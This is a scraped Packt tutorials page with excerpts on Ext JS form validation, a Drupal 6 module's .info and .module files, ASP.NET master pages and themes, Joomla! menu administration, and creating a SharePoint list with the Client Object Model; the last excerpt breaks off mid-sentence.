Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Web Development

1797 Articles
article-image-load-validate-submit-forms-using-ext-js-3-0-part-1
Packt
17 Oct 2011
6 min read
Save for later

Load, Validate, and Submit Forms using Ext JS 3.0: Part 1

Packt
17 Oct 2011
6 min read
Specifying the required fields in a form This recipe uses a login form as an example to explain how to create required fields in a form. How to do it... Initialize the global QuickTips instance: Ext.QuickTips.init(); Create the login form: var loginForm = { xtype: 'form', id: 'login-form', bodyStyle: 'padding:15px; background:transparent', border: false, url:'login.php', items: [{ xtype: 'box', autoEl: { tag: 'div', html: '<div class="app-msg"> <img src="img/magic-wand.png" class="app-img" /> Log in to The Magic Forum</div>'} }, { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false }, { xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password',allowBlank: false }], buttons: [{ text: 'Login', handler: function() { Ext.getCmp('login-form').getForm().submit(); } }, { text: 'Cancel', handler: function() { win.hide(); } }]} Create the window that will host the login form: Ext.onReady(function() { win = new Ext.Window({ layout: 'form', width: 340, autoHeight: true, closeAction: 'hide', items: [loginForm] }); win.show();}); How it works... Initializing the QuickTips singleton allows the form's validation errors to be shown as tool tips. When the form is created, each required field needs to have the allowblank configuration option set to false: { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false},{ xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password', allowBlank: false} Setting allowBlank to false activates a validation rule that requires the length of the field's value to be greater than zero. There's more... Use the blankText configuration option to change the error text when the blank validation fails. For example, the username field definition in the previous code snippet can be changed as shown here: { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false, blankText:'Enter your username'} The resulting error is shown in the following figure: Validation rules can be combined and even customized. Other recipes in this article explain how to range-check a field's length, as well as how to specify the valid format of the field's value. See also... The next recipe titled Setting the minimum and maximum length allowed for a field's value explains how to restrict the number of characters entered in a field The Changing the location where validation errors are displayed recipe, covered later in this article, shows how to relocate a field's error icon Refer to the Deferring field validation until form submission recipe, covered later in this article, to learn how to validate all fields at once upon form submission, instead of using the default automatic field validation The Creating validation functions for URLs, email addresses, and other types of data recipe, covered later in this article, explains the validation functions available in Ext JS The Confirming passwords and validating dates using relational field validation recipe, covered later in this article, explains how to perform validation when the value of one field depends on the value of another field The Rounding up your validation strategy with server-side validation of form fields recipe, covered later in this article, explains how to perform server-side validation Setting the minimum and maximum length allowed for a field's value This recipe shows how to set the minimum and maximum number of characters allowed for a text field. The way to specify a custom error message for this type of validation is also explained. The login form built in this recipe has username and password fields of a login form whose lengths are restricted: How to do it... The first thing is to initialize the QuickTips singleton: Ext.QuickTips.init(); Create the login form: var loginForm = { xtype: 'form', id: 'login-form', bodyStyle: 'padding:15px;background:transparent', border: false, url:'login.php', items: [ { xtype: 'box', autoEl: { tag: 'div', html: '<div class="app-msg"> <img src="img/magic-wand.png" class="app-img" /> Log in to The Magic Forum</div>' } }, { xtype: 'textfield',id: 'login-user', fieldLabel: 'Username', allowBlank: false,minLength: 3,maxLength: 32 }, { xtype: 'textfield',id: 'login-pwd', fieldLabel: 'Password',inputType: 'password', allowBlank: false,minLength: 6,maxLength: 32, minLengthText: 'Password must be at least 6 characters long.' } ], buttons: [{ text: 'Login', handler: function() { Ext.getCmp('login-form').getForm().submit(); } }, { text: 'Cancel', handler: function() { win.hide(); } }]} Create the window that will host the login form: Ext.onReady(function() { win = new Ext.Window({ layout: 'form', width: 340, autoHeight: true, closeAction: 'hide', items: [loginForm] }); win.show();}); How it works... After initializing the QuickTips singleton, which allows the form's validation errors to be shown as tool tips, the form is built. The form is an instance of Ext.form.FormPanel. The username and password fields have their lengths restricted by the way of the minLength and maxLength configuration options: { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username',allowBlank: false, minLength: 3, maxLength: 32},{ xtype: 'textfield', id: 'login-pwd',fieldLabel: 'Password', inputType: 'password',allowBlank: false, minLength: 6, maxLength: 32,minLengthText: 'Password must be at least 6 characters long.'} Notice how the minLengthText option is used to customize the error message that is displayed when the minimum length validation fails: { xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password', allowBlank: false, minLength: 6, maxLength: 32, minLengthText: 'Password must be at least 6 characters long.'} As a last step, the window that will host the form is created and displayed. There's more... You can also use the maxLengthText configuration option to specify the error message when the maximum length validation fails. See also... The previous recipe, Specifying the required fields in a form, explains how to make some form fields required The next recipe, Changing the location where validation errors are displayed, shows how to relocate a field's error icon Refer to the Deferring field validation until form submission recipe (covered later in this article) to learn how to validate all fields at once upon form submission, instead of using the default automatic field validation Refer to the Creating validation functions for URLs, email addresses, and other types of data recipe (covered later in this article) for an explanation of the validation functions available in Ext JS The Confirming passwords and validating dates using relational field validation recipe (covered later in this article) explains how to perform validation when the value of one field depends on the value of another field The Rounding up your validation strategy with server-side validation of form fields recipe (covered later in this article) explains how to perform server-side validation
Read more
  • 0
  • 0
  • 1658

article-image-article-creating-our-first-module-using-drupal6-part1
Packt
12 Oct 2011
8 min read
Save for later

Creating Our First Module using Drupal 6 (Part1)

Packt
12 Oct 2011
8 min read
Starting Out Our first module is going to fetch XML data from Goodreads, a free social networking site for avid readers. There, users track the books they are reading and have read, rate books and write reviews, and share their reading lists with friends. Reading lists at Goodreads are stored in bookshelves. These bookshelves are accessible over a web-based XML/RSS API. We will use that API to display a reading list on the Philosopher Bios website(example website) To integrate the Goodreads information in Drupal, we will create a small module. Since this is our first module, we will get into greater details. A Place for the Module In Drupal, every module is contained in its own directory. This simplifies organization; all of the module's files are located in one place. To keep naming consistent throughout the module (a standard in Drupal), we will name our directory with the module name. Later, we will install this module in Drupal, but for development, the module directory can be wherever it is most convenient. Once we have created a directory named goodreads, we can start creating files for our module. The first file we need to create is the .info (dot-info) file. Creating a .info File Before we start coding our new module, we need to create a simple text file that will hold some basic information about our module. Various Drupal components use the information in this file for module management. The .info file is written as a PHP INI file, which is a simple configuration file format. If you are interested in the details of INI file processing, you can visit http://php.net/manual/en/function.parse-ini-file.php for a description of this format and how it can be parsed in PHP. Our .info file will only be five lines long, which is probably about average. The .info file must follow the standard naming conventions for modules. It must be named <modulename>.info, where <modulename> is the same as the directory name. Our file, then, will be called goodreads.info. Following are the contents of goodreads.info: ;$Id$name = "Goodreads Bookshelf"description = "Displays items from a Goodreads Bookshelf"core = 6.xphp = 5.1 This file isn't particularly daunting. The first line of the file is, at first glance, the most cryptic. However, its function is mundane: it is a placeholder for Drupal's CVS server. Drupal, along with its modules, is maintained on a central CVS (Concurrent Version System) server. CVS is a version control system. It tracks revisions to code over time. One of its features is its ability to dynamically insert version information into a file. However, it needs to know where to insert the information. The placeholder for this is the special string $Id$. But since this string isn't actually a directive in the .info file, it is commented out with the PHP INI comment character, ; (semi-colon). You can insert comments anywhere in your .info file by beginning a line with the ; character. The next four directives each provide module information to Drupal. The name directive provides a human-readable display name for the module. Here's an example: In this above screenshot, the names Aggregator and Blog are taken from the values of the name directives in these modules' .info files. While making the module's proper name short and concise is good (as we did when naming the module directory goodreads above), the display name should be helpful to the user. That usually means that it should be a little longer, and a little more descriptive. However, there is no need to jam all of the module information into the name directive. The description directive is a good place for providing a sentence or two describing the module's function and capabilities. The third directive is the core directive. The core and php directives are new in Drupal 6. This directive specifies what version of Drupal is required for this module to function properly. Our value, 6.x, indicates that this module will run on Drupal 6 (including its minor revisions). In many cases, the Drupal packager will be able to automatically set this (correctly). But Drupal developers are suggesting that this directive be set manually for those who work from CVS. Finally, the php directive makes it possible to specify a minimum version number requirement for PHP. PHP 5, for example, has many features that are missing in PHP 4 (and the modules in this book make use of such features). For that reason, we explicitly note that our modules require at least PHP version 5.1. That's all there is to our first module .info file. What we have here is sufficient for our Goodreads module. Now, we are ready to write some PHP code. A Basic .module File There are two files that every module must have (though many modules have more). The first, the .info file, we examined above. The second file is the .module (dot-module) file, which is a PHP script file. This file typically implements a handful of hook functions that Drupal will call at pre-determined times during a request.     Here, we will create a .module file that will display a small formatted section of information. Later in this article, we will configure Drupal to display this information to site visitors. Our Goal: A Block Hook For our very first module, we will implement the hook_block() function. In Drupal parlance, a block is a chunk of auxiliary information that is displayed on a page alongside the main page content. Sounds confusing? An example might help. Think of your favorite news website. On a typical article page, the text of the article is displayed in the middle of the page. But on the left and right sides of the page and perhaps at the top and bottom as well, there are other bits of information: a site menu, a list of links to related articles, links to comments or forums about this article, etc. In Drupal, these extra pieces are treated as blocks. The hook_block() function isn't just for displaying block contents, though. In fact, this function is responsible for displaying the block and providing all the administration and auxiliary functions related to this block. Don't worry... we'll start out simply and build up from there. Starting the .module Drupal follows rigorous coding and documentation standards (http://drupal.org/coding-standards). In this article, we will do our best to follow these standards. So as we start out our module, the first thing we are going to do is provide some API documentation. Just as with the .info file, the .module file should be named after the module. Following is the beginning of our goodreads.module file: <?php// $Id$/** * @file * Module for fetching data from Goodreads.com. * This module provides block content retrieved from a * Goodreads.com bookshelf. * @see http://www.goodreads.com */ The .module file is just a standard PHP file. So the first line is the opening of the PHP processing instruction: <?php. Throughout this article you may notice something. While all of our PHP libraries begin with the <?php opening, none of them end with the closing ?> characters. This is intentional, in fact, it is not just intentional, but conventional for Drupal. As much as it might offend your well-formed markup language sensibilities, it is good coding practice to omit the closing characters for a library. Why? Because it avoids printing whitespace characters in the script's output, and that can be very important in some cases. For example, if whitespace characters are output before HTTP headers are sent, the client will see ugly error messages at the top of the page. After the PHP tag is the keyword for the version control system: // $Id$ When the module is checked into the Drupal CVS, information about the current revision is placed here. The third part of this example is the API documentation. API documentation is contained in a special comment block, which begins /** and ends with a */. Everything between these is treated as documentation. Special extraction programs like Doxygen can pull out this information and create user-friendly programming information. The Drupal API reference is generated from the API comments located in Drupal's source code. The program, Doxygen, (http://www.stack.nl/~dimitri/doxygen/) is used to generate the API documents from the comments in the code. The majority of the content in these documentation blocks (docblocks, for short) is simply text. But there are a few additions to the text. First, there are special identifiers that provide the documentation generating program with additional information. These are typically prefixed with an @ sign. /** * @file * Module for fetching data from Goodreads.com. * This module provides block content retrieved from a * Goodreads.com bookshelf. * @see http://www.goodreads.com */ In the above example, there are two such identifiers. The @file identifier tells the documentation processor that this comment describes the entire file, not a particular function or variable inside the file. The first comment in every Drupal PHP file should, by convention, be a file-level comment. The other identifier in the above example is the @see keyword. This instructs the documentation processor to attempt to link this file to some other piece of information. In this case, that piece of information is a URL. Functions, constants, and variables can also be referents of a @see identifier. In these cases, the documentation processor will link this docblock to the API information for that function, constant, or variable. With these formalities out of the way, we're ready to start coding our module.
Read more
  • 0
  • 0
  • 760

article-image-null-3
Packt
12 Oct 2011
13 min read
Save for later

ASP.NET 3.5 CMS: Master Pages, Themes, and Menus

Packt
12 Oct 2011
13 min read
Master Pages Earlier you were introduced to a feature called Master Pages, but what exactly are they? The idea behind them is the one that's been around since the early days of development. The idea that you can inherit the layout of one page for use in another is the one that has kept many developers scrambling with Includes and User Controls. This is where Master Pages come into play. They allow you to lay out a page once and use it over and over. By doing this, you can save yourself countless hours of time, as well as being able to maintain the look and feel of your site from a single place. By implementing a Master Page and using ContentPlaceHolders, your page is able to keep its continuity throughout. You'll see on the Master Page (SimpleCMS.master) that it looks similar to a standard .aspx page from ASP.NET, but with some slight differences. The <@...> declaration has had the page identifier changed for a Master declaration. Here is a standard web page declaration: <%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master"AutoEventWireup="false" CodeFile="Default.aspx.vb"Inherits="_Default" Title="Untitled Page" %> Here is the declaration for a Master Page: <%@ Master Language="VB" CodeFile="SimpleCMS.master.vb"Inherits="SimpleCMS" %> This tells the underlying ASP.NET framework how to handle this special page. If you look at the code for the page, you will also see that it inherits from System.Web.UI.MasterPage instead of the standard System.Web.UI.Page. They function similarly but, as we will cover in more detail later, they have a few distinct differences. Now, back to the Master Page. Let's take a closer look at the two existing ContentPlaceHolders. The first one you see on the page is the one with the ID of "Head". This is a default item that is added automatically to a new Master Page and its location is also standard. The system is setting up your page so that any "child" page later on will be able to put things such as Javascript and style tags into this location. It's within the HTML <head> tag, and is handled by the client's browser specially. The control's tag contains a minimal amount of properties-in reality only four, along with a basic set of events you can tie to. The reason for this is actually pretty straightforward - it doesn't need anything more. The ContentPlaceHolder controls aren't really meant to do much, from a programming standpoint. They are meant to be placeholders where other code is injected, from the child pages, and this injected code is where all the "real work" is meant to take place. With that in mind, the system acts more as a pass-through to allow the ContentPlaceHolders to have as little impact on the rest of the site as possible. Now, back to the existing page, you will see the second preloaded ContentPlaceHolder (ContentPlaceHolder1). Again, this one will be automatically added to the new Master Page when it's initially added. Its position is really more of just being "thrown on the page" when you start out. The idea is that you will position this one, as well as any others you add to the page, in such a way as to complement the design of your site. You will typically have one for every zone or region of your layout, to allow you to update the contents within. For simplicity sake, we'll keep with the one zone approach to the site, and will only use the two existing preloaded ContentPlaceHolders for now at least. The positioning of ContentPlaceHolder1 in the current layout is one where it encapsulates the main "body" for the site. All the child pages will render their content up into this section. With that, you will notice the fact that the areas outside this control are really important to the way the site will not only look but also act. Setting up your site headers (images, menus, and so on) will be of the utmost importance. Also, things such as footers, borders, and all the other pieces you will interact with on each page are typically laid out on your Master Page. In the existing example, you will also see the LoginStatus1 control placed directly on the Master Page. This is a great way to share that control and any code/events you may have tied to it, on every page, without having to duplicate your code. There are a few things to keep in mind when putting things together on your Master Page. The biggest of which is that your child/content page will inherit aspects of your Master Page. Styles, attributes, and layout are just a few of the pieces you need to keep in mind. Think of the end resulting page as more of a merger of the Master Page and child/content page. With that in mind, you can begin to understand that when you add something such as a width to the Master Page, which would be consumed by the children, the Child Page will be bound by that. For example, when many people set up their Master Page, they will often use a <table> as their defining container. This is a great way to do this and, in fact, is exactly what's done in the example we are working with. Look at the HTML for the Master Page. You will see that the whole page, in essence, is wrapped in a <table> tag and the ContentPlaceHolder is within a <td>. If you were to happen to apply a style attribute to that table and set its width, the children that fill the ContentPlaceHolder are going to be restricted to working within the confines of that predetermined size. This is not necessarily a bad thing. It will make it easier to work with the child pages in that you don't have to worry about defining their sizes-it's already done for you, and at the same time, it lets you handle all the children from this one location. It can also restrict you for those exact same reasons. You may want a more dynamic approach, and hard setting these attributes on the Master Page may not be what you are after. These are factors you need to think about before you get too far into the designing of your site. Now that you've got a basic understanding of what Master Pages are and how they can function on a simple scale, let's take a look at the way they are used from the child/content page. Look at the Default.aspx (HTML view). You will notice that this page looks distinctly different from a standard (with no Master Page) page. Here you have what a page looks like when you first add it, with no Master Page: <%@ Page Language="VB" AutoEventWireup="false"CodeFile="Default2.aspx.vb" Inherits="Default2" %><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html ><head runat="server"> <title>Untitled Page</title></head><body> <form id="form1" runat="server"> <div> </div> </form></body></html> Compare this to a new Web Form when you select a Master Page. <%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master" AutoEventWireup="false" CodeFile="Default2.aspx.vb" Inherits="Default2" title="Untitled Page" %><asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"></asp:Content><asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"></asp:Content> You will see right away that all the common HTML tags are missing from the page with a Master Page selected. That's because all of these common pieces are being handled in the Master Page and will be rendered from the Master Page. You will also notice that the page with a Master Page also has an additional default attribute added to its page declaration. The title attribute is added so that, when merged and rendered with the Master Page, the page will get the proper title displayed. In addition to the declaration tag differences and the lack of the common HTML tags being absent, the two ContentPlaceHolder tags we defined on the Master Page are automatically referenced through the use of a Content control. These Content controls tie directly to the ContentPlaceHolder tags on the Master Page through the ContentPlaceHolderID attribute. This tells the system where to put the pieces when rendering. The basic idea is that anything between the opening and closing tags of the Content control will be rendered out to the page when being called from a browser. Themes Themes are an extension of another idea, like Master Pages, that has kept developers working long hours. How do you quickly change the look and feel of your site for different users or usages? This is where Themes come in. Themes can be thought of as a container where you store your style sheets, images, and anything else that you may want to interchange in the visual pieces of your site. Themes are folders where you put all of these pieces to group them together. While one user may be visiting your site and seeing it one way, another user can be viewing the exact same site, but get a completely different experience. Let's start off by enabling our site to include the use of Themes. To do this, right-click on the project in the Solutions Explorer, select Add ASP.NET Folder, and then choose Theme from the submenu: The folder will default to Theme1 as its name. I'd suggest that you name this something friendlier though. For now, we will call the Theme as "SimpleCMSTheme". However, later on you may want to add another Theme and give your folders descriptive names, which will really help you keep your work organized. You will see that a Theme is really nothing more than a folder for organizing all the pieces. Let's take a look at what options are available to us. Right-click on the SimpleCMSTheme folder we just created, select Add New Item, and you should see a list similar to this one: Your items may vary depending on your installation, but the key items here are Skin File and Style Sheet. You may already be familiar with stylesheets if you've done any web design work, but let's do a little refresher just in case. Stylesheets, among other uses, are a way to organize all the attributes for your HTML tags. This is really the key feature of stylesheets. You will often see them referenced and called CSS, which stands for Cascading Style Sheets that I'll explain in more detail shortly, but it's also the file extension used when adding a stylesheet to your application. Let's go ahead and add Style Sheet to our site just like the example above. For our example, we'll use the default name StyleSheet.css that the system selects. The system will preload your new stylesheet with one element-the body{} element. Let's go ahead and add a simple attribute to this element. Put your cursor between the open "{" and close "}" brackets and press Ctrl+space and you should get the IntelliSense menu. This is a list of the attributes that the system acknowledges for addition to your element tag. For our testing, let's select the background-color attribute and give it a value of Blue. It should look like this when you are completed: body {background-color: Blue;} Go ahead, save your stylesheet, run the site, and see what happens. If you didn't notice any difference, that's because even though we've now created a Theme for the site and added an attribute to the body element, we've never actually told the site to use this new Theme. Open your web.config and find the <pages…> element. It should be located in the <configuration><system.web>  section, as shown next: Go ahead, select the <pages> element, and put your cursor right after the "s". Press the spacebar and the IntelliSense menu should show up like this: You will see a long list of available items, but the item we are interested in for now is the theme. Select this and you will be prompted to enter a value. Put in the name of the Theme we created earlier. <pages theme="SimpleCMSTheme"> We've now assigned this Theme to our site with one simple line of text. Save your changes and let's run the site again and see what happens. The body element we added to our stylesheet is now read by the system and applied appropriately. View the source on your page and look at how this code was applied. The following line is now part of your rendered code: <link href="App_Themes/SimpleCMSTheme/StyleSheet.css" type="text/css" rel="stylesheet" /> Now that we've seen how to apply a Theme and how to use a stylesheet within it, let's look at one of the other key features of the Theme, the Skin file. A Skin file can be thought of as pre-setting a set of parameters for your controls in your site. This will let you configure multiple attributes, in order to give a certain look and feel to a control so that you can quickly reuse it at any time. Let's jump right in and take a look at how it works, to give you a better understanding. Right-click on the SimpleCMSTheme folder we created and select the Skin File option. Go ahead and use the defaulted name of SkinFile.skin for this example. You should get an example like this: <%--Default skin template. The following skins are provided as examples only.1. Named control skin. The SkinId should be uniquely defined becauseduplicate SkinId's per control type are not allowed in the same theme.<asp:GridView runat="server" SkinId="gridviewSkin" BackColor="White" > <AlternatingRowStyle BackColor="Blue" /></asp:GridView>2. Default skin. The SkinId is not defined. Only one defaultcontrol skin per control type is allowed in the same theme.<asp:Image runat="server" ImageUrl="~/images/image1.jpg" />--%> We now have the default Skin file for our site. Microsoft even provided a great sample here for us. What you see in the example could be translated to say that any GridView added to the site, with either no SkinID specified or with a SkinID of gridviewSkin, will use this skin. In doing so, these GridViews will all use a BackColor of White and AlternatingRowsStyle BackColor of Blue. By putting this in a Skin file as part of our Theme, we could apply these attributes, along with many others, to all like controls at one time. This can really save you a lot of development time. As we go through designing the rest of the CMS site, we will continue to revisit these Theme principles and expand the contents of them, so it is good to keep their functionality in mind as we go along.
Read more
  • 0
  • 0
  • 1186
Visually different images

article-image-customizing-menus-menu-joomla
Packt
12 Oct 2011
8 min read
Save for later

Customizing the Menus Menu in Joomla!

Packt
12 Oct 2011
8 min read
The Top Menu is a horizontal menu; the other menus are vertical. Each menu is coupled with a so-called module, which is administered in the module manager. Menus By clicking on this menu item, you get an overview of the available menus. You can also access the content of these menus by means of the menu bar—Menus | Main Menu, Top Menu, or by clicking the respective menu link in the overview. This Menu Manager serves as an overview and shows you the number of Published and Unpublished menu items, the number of menu items that are in the Trash can, and the respective menu ID. In this section you can, for instance, copy a menu or create a new one. Customizing an Existing Menu Experiment a little with the menus to get a feel for things. The following edit steps are same for all the menus. Go to the menu item Menus | Main Menu. You will see a listing of the menu items that turn up in the mainmenu. Several functions can be executed in the table with a simple mouse click. By clicking on the checkmark, you can enable or disable a menu link. You can change the order of the items by clicking on the triangles or by typing numbers into the fields under Order. If you use the numbers method, you have to click on the disk symbol in the header in order to make the change effective. In the Access Level column, via mouse click you can decide whether the menu is available to all users (Public), only to registered users (Registered), or only to a particular circle of users (Special). The menu items are then displayed or hidden, independent of the user's rights. Menus Icon If you click on this icon, you are taken to the menu overview screen. Default Icon The menu item that is marked as default here with a star is displayed as the start page when someone calls up the URL of your website. At the moment this is the menu item Home, but you can designate any element that you want as the start page. Just mark the checkbox and click on the Default icon. Publish/Unpublish Icon The status of a content element can either be published (activated) or unpublished (deactivated). You can toggle this status individually by clicking the green checkmark and/or the red cross, or marking the checkbox and subsequently clicking on the appropriate icon. If you follow the later method, you can toggle several menu items at the same time. Move Icon This entails the moving of menu entries. Let's move the text More about Joomla! into the top menu. Select the respective menu elements or even several menu elements and click the Move icon. This opens a form, listing the available menus. On the right you will see the elements that you want to move: Select the menu into which you would like to move the marked menu items. Here, we have moved More about Joomla! from Main Menu into the Top Menu. You can admire the results in the front end. Copy Icon You can also copy menu items. To do that, select one or more menu items and click on the Copy icon. Just as with moving, a form with the available menus opens. Select the menu into which you want to copy the marked menu entries. Trash Icon In order to protect you from inadvertently deleting items, when editing them you cannot delete them immediately; you can only throw them in the trash. To throw them into trash can, select one or several menu elements and click on the Trash icon. The marked menu items are then dumped into the trash can. You can display the content of the trash can by clicking on Menus | Menu Trash. Edit Icon (Edit Menu Items) Here you can modify an existing menu, for instance the Web Links. After clicking on the name Web Links you will see the edit form for menu elements: The form is divided into three parts.    Menu Item Type    Menu Item Details    Parameters Menu Item Type Every menu item is of a particular type. We will get into greater details when we create new menus. For instance, a menu item can refer to an installed Joomla! component, a content element, a link to an external website, or many other things. You can see what the type of the link is in this section; in our case it is a link to the Joomla! weblinks component, and you can also see a button with the label Change Type. If you click on that button, you get the following screen: This manager is new in Joomla! version 1.5 and really handy. In version 1.0.x there was no option to change the type of a menu item. You had to delete the old menu item and create a new one. Now you can change the display to a single category or to a link-suggestion menu item, with which you invite other users to suggest links. Now close this; we will get back to it when we create a new menu. Menu Item Details It contains the following options: ID: Everything in an administration requires an ID number and so does our menu item. In this case the menu item has the ID number 48. Joomla! assigns this number for internal administration purposes at the time the item is created. This number cannot be changed. Title: This is the name of the menu and it will be displayed that way on your website. Alias: This is the name of the search-engine friendly URL after the domain name. When this is enabled, the URL for this menu will look as follows: http://localhost/joomla150/web-links Link: This is the request for a component, in other words also the part of the URL after the domain name with which you call up your website. In this case it is  index.php?option=com_weblinks&view=categories Display in: With this you can change the place where the item is displayed; in other words you can move it to another menu. The options field presents you with a list of the available menus. Parent Item: Of course menus can also contain nested, tree-like items. Top means that the item is at the uppermost level. The rest of the items represent existing menu items. If, for instance, you classify and save Web Links under The News, the display on the item list and the display on your website are changed. The following figures show the change. The menu item Web Links has now moved into The News on your website. So you have to first click on The News in order to see the Web Links item. Your website can easily and effectively be structured like a database tree in this manner. Published: With this you can publish a menu item. Order: From the options list, you can select after which link you want to position this link. Access Level: You can restrict users that can see this list. On Click, Open in: A very handy option that influences the behavior of the link. The page is either opened in the existing window or in a new browser window after clicking. You can also define whether the new window will be displayed with or without browser navigation. Parameters The possible parameters of a menu item depend on the type of the item. A simple link, of course, has fewer parameters than a configurable list or for example the front page link. In this case we have a link to the categories. The number and type of parameters depend on the type of the menu item. You can open and collapse the parameter fields by clicking on the header. If the parameter fields are open, the arrow next to header points down. Parameters–Basic The basic parameters are the same for all menu links. Image: Here you can specify an image that must be in the root directory of the media manager (/images/stories/). Depending on the template, this picture is displayed on the left, next to the menu item. Image Align: You can decide if the image should be on the left or right. Show a Feed Link: It is possible to create an RSS feed for every list display in Joomla! 1.5. This could be desirable or undesirable depending on the content of the list. In this case, with list displays, RSS feed links that contain the list items are enabled in the browser.
Read more
  • 0
  • 0
  • 3699

article-image-working-client-object-model-microsoft-sharepoint
Packt
05 Oct 2011
9 min read
Save for later

Working with Client Object Model in Microsoft Sharepoint

Packt
05 Oct 2011
9 min read
Microsoft SharePoint 2010 is the best-in-class platform for content management and collaboration. With Visual Studio, developers have an end-to-end business solutions development IDE. To leverage this powerful combination of tools it is necessary to understand the different building blocks of SharePoint. In this article by Balaji Kithiganahalli, author of Microsoft SharePoint 2010 Development with Visual Studio 2010 Expert Cookbook, we will cover: Creating a list using a Client Object Model Handling exceptions Calling Object Model asynchronously (For more resources on Microsoft Sharepoint, see here.) Introduction Since out-of-the-box web services does not provide the full functionality that the server model exposes, developers always end up creating custom web services for use with client applications. But there are situations where deploying custom web services may not be feasible. For example, if your company is hosting SharePoint solutions in a cloud environment where access to the root folder is not permitted. In such cases, developing client applications with new Client Object Model (OM) will become a very attractive proposition. SharePoint exposes three OMs which are as follows: Managed Silverlight JavaScript (ECMAScript) Each of these OMs provide object interface to functionality exposed in Microsoft. SharePoint namespace. While none of the object models expose the full functionality that the server-side object exposes, the understanding of server Object Models will easily translate for a developer to develop applications using an OM. A managed OM is used to develop custom .NET managed applications (service, WPF, or console applications). You can also use the OM for ASP.NET applications that are not running in the SharePoint context as well. A Silverlight OM is used by Silverlight client applications. A JavaScript OM is only available to applications that are hosted inside the SharePoint applications like web part pages or application pages. Even though each of the OMs provide different programming interfaces to build applications, behind the scenes, they all call a service called Client.svc to talk to SharePoint. This Client.svc file resides in the ISAPI folder. The service calls are wrapped around with an Object Model that developers can use to make calls to SharePoint server. This way, developers make calls to an OM and the calls are all batched together in XML format to send it to the server. The response is always received in JSON format which is then parsed and associated with the right objects. The basic architectural representation of the client interaction with the SharePoint server is as shown in the following image: The three Object Models come in separate assemblies. The following table provides the locations and names of the assemblies: Object OM Location Names Managed ISAPI folder Microsoft.SharePoint.Client.dll Microsoft.SharePoint.Client.Runtime.dll Silverlight LayoutsClientBin Microsoft.SharePoint.Client. Silverlight.dll Microsoft.SharePoint.Client. Silverlight.Runtime.dll JavaScript Layouts SP.js The Client Object Model can be downloaded as a redistributable package from the Microsoft download center at:http://www.microsoft.com/downloads/en/details.aspx?FamilyID=b4579045-b183-4ed4-bf61-dc2f0deabe47 OM functionality focuses on objects at the site collection and below. The main reason being that it will be used to enhance the end-user interaction. Hence the OM is a smaller subset of what is available through the server Object Model. In all three Object Models, main object names are kept the same, and hence the knowledge from one OM is easily portable to another. As indicated earlier, knowledge of server Object Models easily transfer development using client OM The following table shows some of the major objects in the OM and their equivalent names in the server OM: Client OM Server OM ClientContext SPContext Site SPSite Web SPWeb List SPList ListItem SPListItem Field SPField Creating a list using a Managed OM In this recipe, we will learn how to create a list using a Managed Object Model. We will also add a new column to the list and insert about 10 rows of data to the list. For this recipe, we will create a console application that makes use of a generic list template. Getting ready You can copy the DLLs mentioned earlier to your development machine. Your development machine need not have the SharePoint server installed. But you should be able to access one with proper permission. You also need Visual Studio 2010 IDE installed on the development machine. How to do it… In order to create a list using a Managed OM, adhere to the following steps: Launch your Visual Studio 2010 IDE as an administrator (right-click the shortcut and select Run as administrator). Select File | New | Project . The new project wizard dialog box will be displayed (make sure to select .NET Framework 3.5 in the top drop-down box). Select Windows Console application under the Visual C# | Windows | Console Application node from Installed Templates section on the left-hand side. Name the project OMClientApplication and provide a directory location where you want to save the project and click on OK to create the console application template. To add a references to Microsoft.SharePoint.Client.dll and Microsoft.SharePoint.Client.Runtime.dll, go to the menu Project | Add Reference and navigate to the location where you copied the DLLs and select them as shown In the following screenshot: Now add the code necessary to create a list. A description field will also be added to our list. Your code should look like the following (make sure to change the URL passed to the ClientContext constructor to your environment): using Microsoft.SharePoint.Client;namespace OMClientApplication{ class Program { static void Main(string[] args) { using (ClientContext clientCtx = new ClientContext("http://intsp1")) { Web site = clientCtx.Web; // Create a list. ListCreationInformation listCreationInfo = new ListCreationInformation(); listCreationInfo.Title = "OM Client Application List"; listCreationInfo.TemplateType = (int)ListTemplateType.GenericList; listCreationInfo.QuickLaunchOption = QuickLaunchOptions.On; List list = site.Lists.Add(listCreationInfo); string DescriptionFieldSchema = "<Field Type='Note' DisplayName='Item Description' Name='Description' Required='True' MaxLength='500' NumLines='10' />"; list.Fields.AddFieldAsXml(DescriptionFieldSchema, true, AddFieldOptions.AddToDefaultContentType);// Insert 10 rows of data - Concat loop Id with "Item Number" string. for (int i = 1; i < 11; ++i) { ListItemCreationInformation listItemCreationInfo = new ListItemCreationInformation(); ListItem li = list.AddItem(listItemCreationInfo); li["Title"] = string.Format("Item number {0}",i); li["Item_x0020_Description"] = string.Format("Item number {0} from client Object Model", i); li.Update(); } clientCtx.ExecuteQuery(); Console.WriteLine("List creation completed"); Console.Read(); } } }} Build and execute the solution by pressing F5 or from the menu Debug | Start Debugging . This should bring up the command window with a message indicating that the List creation completed as shown in the following screenshot. Press Enter and close the command window. Navigate to your site to verify that the list has been created. The following screenshot shows the list with the new field and ten items inserted: (Move the mouse over the image to enlarge.) How it works... The first line of the code in the Main method is to create an instance of ClientContext class. The ClientContext instance provides information about the SharePoint server context in which we will be working. This is also the proxy for the server we will be working with. We passed the URL information to the context to get the entry point to that location. When you have access to the context instance, you can browse the site, web, and list objects of that location. You can access all the properties like Name , Title , Description , and so on. The 